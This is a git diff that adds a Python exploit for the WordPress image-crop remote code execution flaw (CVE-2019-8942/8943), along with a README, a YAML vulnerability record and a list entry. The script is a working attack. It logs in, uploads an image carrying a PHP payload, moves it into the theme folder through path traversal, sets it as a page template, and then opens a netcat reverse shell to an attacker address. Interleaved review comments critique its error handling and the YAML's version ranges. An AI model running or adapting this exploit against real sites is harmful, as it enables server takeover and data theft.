diff --git a/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py b/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py
new file mode 100644
index 00000000..94f4582c
--- /dev/null
+++ b/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py
@@ -0,0 +1,185 @@ +#/usr/bin/env python3 +# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution +# Date: 2020-02-01 +# Exploit Author: OUSSAMA RAHALI ( aka V0lck3r) +# https://www.linkedin.com/in/oussamarahali +# Discovery Author : RIPSTECH Technology +# Version: WordPress 5.0.0 and <= 4.9.8 . +# References : CVE-2019-8942 | CVE-2019-8943 | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ + +import requests +import re +import sys +from datetime import datetime + +banner = """ +__ __ _ ____ ____ _____ +\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___ | _ \ / ___| ____| + \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | | | _| + \ V V / (_) | | | (_| | |_) | | | __/\__ \__ \ | _ <| |___| |___ + \_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/ |_| \_\\____|_____| + |_| + 5.0.0 and <= 4.9.8 +""" +print(banner) +print("usage :") +print("=======") +usage = 'python3 RCE_wordpress.py http://:/ ' +print(usage) + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +wp_theme = sys.argv[4] # wpscan results + +lhost = '10.10.10.10' #attacker ip +lport = '4141' #listening port + +date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/' + +imagename = 'gd.jpg' +# ====== +# Note : +# ====== +# It could be any jpg image, BUT there are some modifications first : +# 1- image name as : "gd.jpg" +# 2- place the image in the same directory as this exploit. +# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="" + +data = { + 'log':username, + 'pwd':password, + 'wp-submit':'Log In', + 'redirect_to':url+'wp-admin/', + 'testcookie':1 +} + +r = requests.post(url+'wp-login.php',data=data) + +if r.status_code == 200: + print("[+] Login successful.\n") +else: + print("[-] Failed to login.") + exit(0) + +cookies = r.cookies + +print("[+] Getting Wp Nonce ... 
") + +res = requests.get(url+'wp-admin/media-new.php',cookies=cookies) +wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) + +if len(wp_nonce_list) == 0 : + print("[-] Failed to retrieve the _wpnonce \n") + exit(0) +else : + wp_nonce = wp_nonce_list[0] + print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n") + +print("[+] Uploading the image ... ") + +data = { + 'name': 'gd.jpg', + 'action': 'upload-attachment', + '_wpnonce': wp_nonce +} + +image = {'async-upload': (imagename, open(imagename, 'rb'))} +r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies) +if r_upload.status_code == 200: + image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] + _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] + print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n") +else : + print("[-] Failed to receive a response for uploaded image ! try again . \n") + exit(0) + +print("[+] Changing the path ... ") + + +data = { + '_wpnonce':_wp_nonce, + 'action':'editpost', + 'post_ID':image_id, + 'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali' +} + +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Path has been changed successfully. \n") +else : + print("[-] Failed to change the path ! Make sure the theme is correcte .\n") + exit(0) + +print("[+] Getting Ajax nonce ... ") + +data = { + 'action':'query-attachments', + 'post_id':0, + 'query[item]':43, + 'query[orderby]':'date', + 'query[order]':'DESC', + 'query[posts_per_page]':40, + 'query[paged]':1 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text) + +if res.status_code == 200 and len(ajax_nonce_list) != 0 : + ajax_nonce = ajax_nonce_list[0] + print('[+] Ajax Nonce retrieved successfully ! 
ajax_nonce : '+ ajax_nonce+'\n') +else : + print("[-] Failed to retrieve ajax_nonce.\n") + exit(0) + + +print("[+] Cropping the uploaded image ... ") + +data = { + 'action':'crop-image', + '_ajax_nonce':ajax_nonce, + 'id':image_id, + 'cropDetails[x1]':0, + 'cropDetails[y1]':0, + 'cropDetails[width]':200, + 'cropDetails[height]':100, + 'cropDetails[dst_width]':200, + 'cropDetails[dst_height]':100 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Done . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +print("[+] Creating a new post to include the image... ") + +res = requests.post(url+'wp-admin/post-new.php', cookies=cookies) +if res.status_code == 200: + _wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0] + post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0] + print("[+] Post created successfully . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +data={ + '_wpnonce':_wpnonce, + 'action':'editpost', + 'post_ID':post_id, + 'post_title':'RCE poc by v0lck3r', + 'post_name':'RCE poc by v0lck3r', + 'meta_input[_wp_page_template]':'cropped-rahali.jpg' +} +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n') + print("[+] Executing payload !") + requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies) + +else : + print("[-] Erorr ! Try again (maybe change the payload) \n") + exit(0) \ No newline at end of file diff --git a/cve/WordPress/2019/CVE-2019-8943/README.md b/cve/WordPress/2019/CVE-2019-8943/README.md new file mode 100644 index 00000000..6b198687 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8943/README.md 
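Review bot: Every failure branch in this script ends with `exit(0)` (after the login, nonce, upload, path-change, ajax-nonce, crop and post steps), so a run that fails still reports success to the shell; change each to `sys.exit(1)` (sys is already imported) so wrappers and CI can distinguish the outcomes. The shebang on the first line is `#/usr/bin/env python3` and is missing the `!`, so the file is not directly executable. The four `re.findall(...)[0]` lookups (image id, update nonce, post nonce, post id) raise a bare IndexError on an unexpected response instead of printing a diagnostic, and `sys.argv[1..4]` are read with no length check right after the usage text is printed, so a missing argument also dies with a traceback rather than the usage message. `open(imagename, 'rb')` is passed straight into `files=` and is never closed; a `with open(imagename, 'rb') as fh:` around the upload call would release the handle.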
@@ -0,0 +1,19 @@
+# CVE-2019-8943
+
+WordPress 5.0.0 - Image Remote Code Execution
+
+Exploit of CVE-2019-8942 and CVE-2019-8943 using python : ExploitDB : https://www.exploit-db.com/exploits/49512
+
+The original exploit for metasploit : WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) : https://www.exploit-db.com/exploits/46662
+
+## video :
+
+[![Watch the video](https://raw.githubusercontent.com/v0lck3r/CVE-2019-8943/main/poc.png)](https://player.vimeo.com/video/507536840)
+## Description:
+
+
+The video below demonstrates how an attacker could potentially compromise a wordpress website and achieve RCE (remote code execution) by exploiting the vulnerabilities linked above (CVE-2019-8942 and CVE-2019-8943).
+
+Note: I made this exploit while I was working on tryhackme blog room : https://tryhackme.com/room/blog without using metasploit .
+
+By : Oussama RAHALI
\ No newline at end of file
diff --git a/cve/WordPress/2019/yaml/CVE-2019-8943.yaml b/cve/WordPress/2019/yaml/CVE-2019-8943.yaml
new file mode 100644
index 00000000..a834c00a
--- /dev/null
+++ b/cve/WordPress/2019/yaml/CVE-2019-8943.yaml
@@ -0,0 +1,20 @@
+id: CVE-2019-8943
+source: https://github.com/v0lck3r/CVE-2019-8943
+info:
+ name: WordPress
+ severity: MEDIUM
+ description: |
+ WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
+ scope-of-influence:
+ WordPress < 4.9.9
+ WordPress 5.x < 5.0.3
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-8943
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2019-8943
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: RCE, 远程代码执行
\ No newline at end of file
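Review bot: The affected-version data in the CVE-2019-8943.yaml entry is internally inconsistent: `description` says "WordPress through 5.0.3" while `scope-of-influence` lists `WordPress 5.x < 5.0.3`, which excludes 5.0.3. One of the two is off by one release; confirm against the NVD reference already listed under `reference` and align both fields, since anyone filtering on the scope field would otherwise miss a version the description calls vulnerable. The `severity: MEDIUM` and `cvss-score: 6.5` values do agree with the listed vector.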
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 07af3a60..ec68679e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -100,6 +100,8 @@ cve:
 weblogic:
 - CVE-2020-2551
 - CVE-2020-14882
+ wordpress:
+ - CVE-2019-8943
 polkit:
 - CVE-2021-4034
 - CVE-2021-4115